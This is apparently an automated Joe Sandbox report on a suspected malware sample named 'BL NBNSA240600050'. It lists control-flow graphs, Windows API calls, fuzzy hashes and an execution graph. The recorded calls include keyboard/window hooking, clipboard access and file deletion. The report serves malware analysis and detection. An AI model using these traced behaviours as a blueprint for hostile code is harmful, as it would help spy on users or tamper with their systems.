                                    control_flow_graph 446 30dd41b-30dd4af GetCurrentProcess 451 30dd4b8-30dd4ec GetCurrentThread 446->451 452 30dd4b1-30dd4b7 446->452 453 30dd4ee-30dd4f4 451->453 454 30dd4f5-30dd529 GetCurrentProcess 451->454 452->451 453->454 455 30dd52b-30dd531 454->455 456 30dd532-30dd54d call 30dd5f0 454->456 455->456 460 30dd553-30dd582 GetCurrentThreadId 456->460 461 30dd58b-30dd5ed 460->461 462 30dd584-30dd58a 460->462 462->461
                                    APIs
                                    • GetCurrentProcess.KERNEL32 ref: 030DD49E
                                    • GetCurrentThread.KERNEL32 ref: 030DD4DB
                                    • GetCurrentProcess.KERNEL32 ref: 030DD518
                                    • GetCurrentThreadId.KERNEL32 ref: 030DD571
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1671251005.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_30d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID: Current$ProcessThread
                                    • String ID:
                                    • API String ID: 2063062207-0
                                    • Opcode ID: 00fa12d16943892b7bf627e03a1bf64287bb65afea8eb8d027c266bf720de170
                                    • Instruction ID: f9e70a3be1b12a078f7370de521392b2a999e480f57f2c0e2231b4569e62daed
                                    • Opcode Fuzzy Hash: 00fa12d16943892b7bf627e03a1bf64287bb65afea8eb8d027c266bf720de170
                                    • Instruction Fuzzy Hash: 785164B09017098FDB54DFA9D548BAEFBF1AF88314F20C069E409A7260DB34A884CB65

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 469 30dd420-30dd4af GetCurrentProcess 473 30dd4b8-30dd4ec GetCurrentThread 469->473 474 30dd4b1-30dd4b7 469->474 475 30dd4ee-30dd4f4 473->475 476 30dd4f5-30dd529 GetCurrentProcess 473->476 474->473 475->476 477 30dd52b-30dd531 476->477 478 30dd532-30dd54d call 30dd5f0 476->478 477->478 482 30dd553-30dd582 GetCurrentThreadId 478->482 483 30dd58b-30dd5ed 482->483 484 30dd584-30dd58a 482->484 484->483
                                    APIs
                                    • GetCurrentProcess.KERNEL32 ref: 030DD49E
                                    • GetCurrentThread.KERNEL32 ref: 030DD4DB
                                    • GetCurrentProcess.KERNEL32 ref: 030DD518
                                    • GetCurrentThreadId.KERNEL32 ref: 030DD571
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1671251005.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_30d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID: Current$ProcessThread
                                    • String ID:
                                    • API String ID: 2063062207-0
                                    • Opcode ID: 9259f1da9b98333e35cd75c5ef536e423e4c182b74681ec5759912b44b593512
                                    • Instruction ID: 16a7230a2402f9f33a23af554d668caf1fd95dc0d71ca376c199249a92c2c171
                                    • Opcode Fuzzy Hash: 9259f1da9b98333e35cd75c5ef536e423e4c182b74681ec5759912b44b593512
                                    • Instruction Fuzzy Hash: 4D5155B09117098FDB54DFA9D548BEEFBF1AF48314F20C069E409A7260DB34A984CF65

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 850 30db1b0-30db1bf 852 30db1eb-30db1ef 850->852 853 30db1c1-30db1ce call 30dab54 850->853 854 30db1f1-30db1fb 852->854 855 30db203-30db244 852->855 860 30db1e4 853->860 861 30db1d0 853->861 854->855 862 30db246-30db24e 855->862 863 30db251-30db25f 855->863 860->852 908 30db1d6 call 30db448 861->908 909 30db1d6 call 30db43b 861->909 862->863 864 30db261-30db266 863->864 865 30db283-30db285 863->865 868 30db268-30db26f call 30dab60 864->868 869 30db271 864->869 867 30db288-30db28f 865->867 866 30db1dc-30db1de 866->860 870 30db320-30db39a 866->870 873 30db29c-30db2a3 867->873 874 30db291-30db299 867->874 871 30db273-30db281 868->871 869->871 901 30db39c-30db39e 870->901 902 30db3a1-30db3e0 870->902 871->867 875 30db2a5-30db2ad 873->875 876 30db2b0-30db2b9 call 30dab70 873->876 874->873 875->876 882 30db2bb-30db2c3 876->882 883 30db2c6-30db2cb 876->883 882->883 885 30db2cd-30db2d4 883->885 886 30db2e9-30db2f6 883->886 885->886 887 30db2d6-30db2e6 call 30dab80 call 30dab90 885->887 891 30db319-30db31f 886->891 892 30db2f8-30db316 886->892 887->886 892->891 901->902 903 30db3e8-30db413 GetModuleHandleW 902->903 904 30db3e2-30db3e5 902->904 905 30db41c-30db430 903->905 906 30db415-30db41b 903->906 904->903 906->905 908->866 909->866
                                    APIs
                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 030DB406
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1671251005.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_30d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    • String ID:
                                    • API String ID: 4139908857-0
                                    • Opcode ID: a14b57fc65952dca99e9503cf7a18e0677b23c8162ffe9116c969600f376e584
                                    • Instruction ID: b5f35a774444a0c034c2e00e457af04cc382464320c1b193ef52c473ad5413f2
                                    • Opcode Fuzzy Hash: a14b57fc65952dca99e9503cf7a18e0677b23c8162ffe9116c969600f376e584
                                    • Instruction Fuzzy Hash: 0A714470A01B058FDB64DF2AD1447AABBF5FF88300F14892DD48ADBA50DB74E949CB94

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 910 30d590c-30d590e 911 30d5915-30d5916 910->911 912 30d5910-30d5913 910->912 913 30d591d-30d59d9 CreateActCtxA 911->913 914 30d5918-30d591c 911->914 912->911 916 30d59db-30d59e1 913->916 917 30d59e2-30d5a3c 913->917 914->913 916->917 924 30d5a3e-30d5a41 917->924 925 30d5a4b-30d5a4f 917->925 924->925 926 30d5a51-30d5a5d 925->926 927 30d5a60 925->927 926->927 929 30d5a61 927->929 929->929
                                    APIs
                                    • CreateActCtxA.KERNEL32(?), ref: 030D59C9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1671251005.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_30d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID: Create
                                    • String ID:
                                    • API String ID: 2289755597-0
                                    • Opcode ID: a3d5c9df530ee20a110a895c4b11f2e303eb82a452009ae6971dd1a0aee0116a
                                    • Instruction ID: f0de6c567ea56e6cc20c59467b2477528ffcf1783f06fd81e99ef3c8cbbef37a
                                    • Opcode Fuzzy Hash: a3d5c9df530ee20a110a895c4b11f2e303eb82a452009ae6971dd1a0aee0116a
                                    • Instruction Fuzzy Hash: 8341F2B0C01729CBDB24CFA9C984BDDBBF5BF49304F24806AD809AB255DB755945CF90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 930 30d44b0-30d59d9 CreateActCtxA 934 30d59db-30d59e1 930->934 935 30d59e2-30d5a3c 930->935 934->935 942 30d5a3e-30d5a41 935->942 943 30d5a4b-30d5a4f 935->943 942->943 944 30d5a51-30d5a5d 943->944 945 30d5a60 943->945 944->945 947 30d5a61 945->947 947->947
                                    APIs
                                    • CreateActCtxA.KERNEL32(?), ref: 030D59C9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1671251005.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_30d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID: Create
                                    • String ID:
                                    • API String ID: 2289755597-0
                                    • Opcode ID: 04cae3e43096f1e857fb724474e734d5ee8e0a9d1e4669d99966bb48279e35dc
                                    • Instruction ID: 362efdf0e6dde06d2554dbe051a16ad5d6e68a67be91b2c94e483702cf70b238
                                    • Opcode Fuzzy Hash: 04cae3e43096f1e857fb724474e734d5ee8e0a9d1e4669d99966bb48279e35dc
                                    • Instruction Fuzzy Hash: 3341DFB0C01729CBDB24CFA9C884BDEBBF5BF49304F24806AD409AB255DB756985CF90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 948 7815038-781508c 950 7815097-78150a6 948->950 951 781508e-7815094 948->951 952 78150a8 950->952 953 78150ab-78150e4 DrawTextExW 950->953 951->950 952->953 954 78150e6-78150ec 953->954 955 78150ed-781510a 953->955 954->955
                                    APIs
                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 078150D7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674249750.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7810000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID: DrawText
                                    • String ID:
                                    • API String ID: 2175133113-0
                                    • Opcode ID: e7a99b4fb3b4dbdef8a4a6a43fd949d62d9234919e886300232278e0b6edb350
                                    • Instruction ID: ee96ed7763562e79347472f3c3223d8132059ed62360bffc6d99974dfbc2c4d1
                                    • Opcode Fuzzy Hash: e7a99b4fb3b4dbdef8a4a6a43fd949d62d9234919e886300232278e0b6edb350
                                    • Instruction Fuzzy Hash: 3831E5B5D002499FDB10CF9AD884AEEFBF8FF58320F14842AE519A7210D775A554CFA0
                                    APIs
                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 078150D7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674249750.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7810000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID: DrawText
                                    • String ID:
                                    • API String ID: 2175133113-0
                                    • Opcode ID: ad03fbbbb3d97da0b510140502b6724d72cb0c857eee851834294d62d6335081
                                    • Instruction ID: 9531767328eab557261a6594166248072515b576f44271d091ccd2bae1d4bcc3
                                    • Opcode Fuzzy Hash: ad03fbbbb3d97da0b510140502b6724d72cb0c857eee851834294d62d6335081
                                    • Instruction Fuzzy Hash: 3521C3B59002099FDB10CF9AD884ADEFBF9FB58320F14842AE519A7210D775A554CFA4
                                    APIs
                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,030DB481,00000800,00000000,00000000), ref: 030DB672
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1671251005.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_30d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: f17f161deab64f1ae711bacecbc1a08931e61d28a237f7c08afbbdb191c3d314
                                    • Instruction ID: 463c78a8ad68f02f1e95807c6f94587024d8909a45cc8c56c3468eacc7493b09
                                    • Opcode Fuzzy Hash: f17f161deab64f1ae711bacecbc1a08931e61d28a237f7c08afbbdb191c3d314
                                    • Instruction Fuzzy Hash: 0B2134B68053488FCB10CFAAC484ADEBBF4EF89314F15846AD559AB211C378A544CFA5
                                    APIs
                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 030DD6EF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1671251005.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_30d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    • String ID:
                                    • API String ID: 3793708945-0
                                    • Opcode ID: fe1a16da700170acc1d191da0fc1d164c6f4965c7ed30da4895abfee05a06dd9
                                    • Instruction ID: 46df2f60628cfa3a060f3623d9817a63a0da1db7c123713c816bdfe6555345de
                                    • Opcode Fuzzy Hash: fe1a16da700170acc1d191da0fc1d164c6f4965c7ed30da4895abfee05a06dd9
                                    • Instruction Fuzzy Hash: 9F21E3B59002489FDB10CFAAD584ADEBBF8FF48310F14841AE918A3350D378A950CFA4
                                    APIs
                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 030DD6EF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1671251005.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_30d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    • String ID:
                                    • API String ID: 3793708945-0
                                    • Opcode ID: 5137943410c8a63e4cc79c170dad78297dc91999720c29177753d4c4a61dbe30
                                    • Instruction ID: 46d9ff0ccb72e531dd8ce0269f82d127a39b000e5d932167fe0f09e3266d6753
                                    • Opcode Fuzzy Hash: 5137943410c8a63e4cc79c170dad78297dc91999720c29177753d4c4a61dbe30
                                    • Instruction Fuzzy Hash: 8921E0B5901208DFDB10CFA9D584AEEBBF5FF48310F14841AE958A7350D379A954CFA4
                                    APIs
                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,030DB481,00000800,00000000,00000000), ref: 030DB672
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1671251005.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_30d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: 63d1ef4a0b32dcb35ca40226ed84b618469b05ce839eb71710d25287d28a2602
                                    • Instruction ID: 97ee69d31d8d1629b40c207d7a19a83da18f2343e61be9ddf6bb18e9dd40b7fd
                                    • Opcode Fuzzy Hash: 63d1ef4a0b32dcb35ca40226ed84b618469b05ce839eb71710d25287d28a2602
                                    • Instruction Fuzzy Hash: 391126B69013088FCB10CF9AC444ADEFBF4EB58310F15842ED419A7310C379A544CFA4
                                    APIs
                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,030DB481,00000800,00000000,00000000), ref: 030DB672
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1671251005.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_30d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: 6753679d83171af43bc866cface50f82c3e387bd8b4f512e64dfb6096d1e38f4
                                    • Instruction ID: 8379f30e3f4ecdfa91830ecc0a27db17289b3449aa7eda4d89c6b53a1679bf02
                                    • Opcode Fuzzy Hash: 6753679d83171af43bc866cface50f82c3e387bd8b4f512e64dfb6096d1e38f4
                                    • Instruction Fuzzy Hash: E311F3B69003499FDB10CF9AC884ADEFBF4EB48310F15842AD519A7210C779A945CFA5
                                    APIs
                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 030DB406
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1671251005.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_30d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    • String ID:
                                    • API String ID: 4139908857-0
                                    • Opcode ID: 052255899f8070b9134d4d5638dde4693edf23c4a2395e0d85572c23cdf210e7
                                    • Instruction ID: a0f2415650e2cee8b1a1312637a41d65519e23da0877943a24e1b9c7724b5849
                                    • Opcode Fuzzy Hash: 052255899f8070b9134d4d5638dde4693edf23c4a2395e0d85572c23cdf210e7
                                    • Instruction Fuzzy Hash: 9511E0B5C003498FCB10DF9AC544ADEFBF4AF88324F15842AD469B7610C379A545CFA5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1671111674.000000000308D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0308D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_308d000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b950ae0a1285f60686f142f6b8b9f510ff3f923fedca699c887598ae2b55a3a5
                                    • Instruction ID: 976c0dfdd980d2cc297234e6d485804848e8d239fdd5af4ebbbc2816436d714a
                                    • Opcode Fuzzy Hash: b950ae0a1285f60686f142f6b8b9f510ff3f923fedca699c887598ae2b55a3a5
                                    • Instruction Fuzzy Hash: 14213471500200DFCB04EF14D9C4B2AFBA5FB84314F24CAADE8894B296C376D846CA61
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1671111674.000000000308D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0308D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_308d000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c31a3eeb206b19e8d4e085cc33d1635ca9bcb910c2f3f4d9d5f281ff142284c5
                                    • Instruction ID: 17acef9c5d29306e4504e824b5896a3612348c38d3bd70d3c32e0793fbbff6f5
                                    • Opcode Fuzzy Hash: c31a3eeb206b19e8d4e085cc33d1635ca9bcb910c2f3f4d9d5f281ff142284c5
                                    • Instruction Fuzzy Hash: AE212671505300EFCB45EF14D5C0B2ABBA5FB94314F24CAADE8894B396C33AD846CB61
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1671111674.000000000308D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0308D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_308d000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                    • Instruction ID: bfe8e7aa1e408e1439de3e3847a7e3c92b611209472a718fdd57d0cd72bebf25
                                    • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                    • Instruction Fuzzy Hash: A911DA75504280CFCB42DF14D5C4B15FFB2FB94318F28C6AAD8894B696C33AD40ACBA2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1671111674.000000000308D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0308D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_308d000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                    • Instruction ID: 82d19268c0874969640f6a827c43d626a9b060285794b40b6a4f7cbaa6efe977
                                    • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                    • Instruction Fuzzy Hash: D611BB75504280CFCB06DF14D5C4B15FBA2FB84318F28C6AAD8494BA96C33AE44ACB62
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1671030995.0000000001A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A5D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1a5d000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 81cc2b80729d9a5128b120950722183eb7a9afa35f364f9f460a16e0c9299520
                                    • Instruction ID: e341f529350abefe1b8c050e0ffa814c838d3fa0b42097e09ab6225b85780be8
                                    • Opcode Fuzzy Hash: 81cc2b80729d9a5128b120950722183eb7a9afa35f364f9f460a16e0c9299520
                                    • Instruction Fuzzy Hash: A901F23100D3809AF7509BA9CD84B67BFA8EF41324F18C42AED090E286C238D880CAB1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1671030995.0000000001A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A5D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1a5d000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 813594b2de38b817ec210e76a393d76ef91463fa052a1d21eab92cb5a1fd8d26
                                    • Instruction ID: 535789f01b21225c53fbfdbab25ae505211f1dc65d717d3f6be9a8a50cdd8962
                                    • Opcode Fuzzy Hash: 813594b2de38b817ec210e76a393d76ef91463fa052a1d21eab92cb5a1fd8d26
                                    • Instruction Fuzzy Hash: F2F09071409384AEE7218B1ACDC4B66FFA8EF45734F18C95AED484F286C3799844CBB1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674991391.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e40000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: TJpq$Tekq$xbnq
                                    • API String ID: 0-3321955333
                                    • Opcode ID: da593c92f30db14b8c32bd6652185a21ef5367ac9ce78c930c19fc4dcace60e5
                                    • Instruction ID: c320b5fe31cadf75cbed45eb6cf8dec0d6c15350070dd17a8001d445368f75e2
                                    • Opcode Fuzzy Hash: da593c92f30db14b8c32bd6652185a21ef5367ac9ce78c930c19fc4dcace60e5
                                    • Instruction Fuzzy Hash: 69E144B1A016299FDB14DFA8D988B9DBBF1FF48304F1181A9E409EB251DB34AD85CF40
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1675466738.0000000008380000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: true
                                    • Associated: 00000000.00000002.1675267132.0000000008300000.00000004.08000000.00040000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8300000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 6mEu
                                    • API String ID: 0-426385121
                                    • Opcode ID: 35677916984020cff39d1ef455642d4bc04125ce068a26f302b35bf4babad2e9
                                    • Instruction ID: 8e1f1626844dce8f053191775772ea5cfd20ca98f7470bc069f83bab47c7e2e5
                                    • Opcode Fuzzy Hash: 35677916984020cff39d1ef455642d4bc04125ce068a26f302b35bf4babad2e9
                                    • Instruction Fuzzy Hash: 64E1F774E01219CFCB14DFA9D580AAEFBB2FF88305F248169E415AB356D734A941CFA1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674991391.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e40000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'kq
                                    • API String ID: 0-3255046985
                                    • Opcode ID: 8e736de18692983875d2f083b99d77848a8f521e96dd71d61c9534c8cf07ff7c
                                    • Instruction ID: f1e89ee3c916a6a9c0837471732c2ddfb2766430c2a120b004acc79eb7d29e84
                                    • Opcode Fuzzy Hash: 8e736de18692983875d2f083b99d77848a8f521e96dd71d61c9534c8cf07ff7c
                                    • Instruction Fuzzy Hash: 56512FB0A016098FE748EF3FF95569ABBE7FBC4300B14D539C00897269EB396905CB91
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674991391.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e40000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'kq
                                    • API String ID: 0-3255046985
                                    • Opcode ID: 2c9726f7442c1f6cf5236483db5c6945620c3e537740acff831bdf8b8bd76a8d
                                    • Instruction ID: 617db223a675011039bd500547aef4c1c721b7475ffaa9467557364fd34e8d69
                                    • Opcode Fuzzy Hash: 2c9726f7442c1f6cf5236483db5c6945620c3e537740acff831bdf8b8bd76a8d
                                    • Instruction Fuzzy Hash: D05120B0A016088FE748EF7FE95569ABBE7FBC4300F14D539C00897265EB396805CB91
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1675466738.0000000008380000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: true
                                    • Associated: 00000000.00000002.1675267132.0000000008300000.00000004.08000000.00040000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8300000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b33ca1875982bc55a173f8768faa8dda6043f2076c28edcf0e164ee3a965c467
                                    • Instruction ID: 684ade880d183318f738a8603c09a00e3a208c0483e8a7f37baa18677f9f6c50
                                    • Opcode Fuzzy Hash: b33ca1875982bc55a173f8768faa8dda6043f2076c28edcf0e164ee3a965c467
                                    • Instruction Fuzzy Hash: 1DE10674E01219CFCB14DFA9C5849AEBBB2FF88305F248169E419AB356D731AD41CFA1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1671251005.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_30d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d10266a1468fb8dbdf9ab50a9a9fc7b5c1598116685ce3709eb8ac0199c2966b
                                    • Instruction ID: fd4a37a16760cf049cb8bf38ef21247944fb3341c665afc5b81854664ecc8cb7
                                    • Opcode Fuzzy Hash: d10266a1468fb8dbdf9ab50a9a9fc7b5c1598116685ce3709eb8ac0199c2966b
                                    • Instruction Fuzzy Hash: 57A14B36A013068FCF05DFA4D8445DEBBF2BF85301B19856AE906AF265DB31E956CB40
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674991391.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e40000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9bf5a535f8324d7df9284bd4091c780532751d49971aeaf584e2eab28de52358
                                    • Instruction ID: be1a254a63bff0dc4ba63d502674fa9de7e31526c573783e7efe84b31b6e89e2
                                    • Opcode Fuzzy Hash: 9bf5a535f8324d7df9284bd4091c780532751d49971aeaf584e2eab28de52358
                                    • Instruction Fuzzy Hash: 89D1157192071ADACB01EB68DA54699F7B1FFD5300F10D79AD10937224EB70AAC4CF91
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1675466738.0000000008380000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: true
                                    • Associated: 00000000.00000002.1675267132.0000000008300000.00000004.08000000.00040000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8300000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ab4389dc39d2ecf0ead5e6e16d7d1e99318aad563997265c166f61824099b08e
                                    • Instruction ID: 22b0917f9a337d41d6bbbb5ad428eaf60f70a6978408fbb3dac9337434b388da
                                    • Opcode Fuzzy Hash: ab4389dc39d2ecf0ead5e6e16d7d1e99318aad563997265c166f61824099b08e
                                    • Instruction Fuzzy Hash: 2D51C374E09609CFCF08DF9AD4445EEFBFAAB89301F14902AE819B7621D7349A41CF54

                                    Execution Graph

                                    Execution Coverage:11.9%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:0%
                                    Total number of Nodes:178
                                    Total number of Limit Nodes:21
                                    execution_graph 39482 d08060 39483 d080a6 DeleteFileW 39482->39483 39485 d080df 39483->39485 39458 63721d3 39459 63721f0 GetModuleHandleW 39458->39459 39461 6372265 39459->39461 39462 637a710 39464 637a754 SetWindowsHookExA 39462->39464 39465 637a79a 39464->39465 39466 6376d70 DuplicateHandle 39467 6376e06 39466->39467 39468 6378950 39469 63789aa OleGetClipboard 39468->39469 39470 63789ea 39469->39470 39486 d00848 39488 d0084e 39486->39488 39487 d0091b 39488->39487 39490 d0135f 39488->39490 39497 d01366 39490->39497 39491 d0147a 39491->39488 39497->39491 39498 d08110 39497->39498 39502 d08120 39497->39502 39506 6370210 39497->39506 39513 6370202 39497->39513 39520 d08819 39497->39520 39500 d0811f 39498->39500 39499 d081fa 39499->39497 39500->39499 39525 d07808 39500->39525 39504 d0813f 39502->39504 39503 d081fa 39503->39497 39504->39503 39505 d07808 MoveFileA 39504->39505 39505->39503 39507 6370222 39506->39507 39509 63702d3 39507->39509 39529 6370858 39507->39529 39509->39497 39514 6370210 39513->39514 39516 63702d3 39514->39516 39517 6370858 GetModuleHandleW 39514->39517 39515 6370299 39518 63782f0 KiUserCallbackDispatcher 39515->39518 39519 6378300 KiUserCallbackDispatcher 39515->39519 39516->39497 39517->39515 39518->39516 39519->39516 39521 d08823 39520->39521 39522 d088d9 39521->39522 39583 63df4e0 39521->39583 39588 63df4d0 